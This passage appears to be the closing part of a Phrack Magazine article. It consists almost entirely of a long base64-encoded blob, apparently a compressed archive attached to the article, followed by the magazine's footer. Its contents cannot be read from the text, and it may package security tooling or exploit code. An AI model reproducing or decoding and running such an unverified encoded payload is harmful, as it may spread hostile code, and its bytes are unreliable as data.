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
IA
EOF

|=[ EOF ]=---------------------------------------------------------------=|
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2024, Phrack Magazine.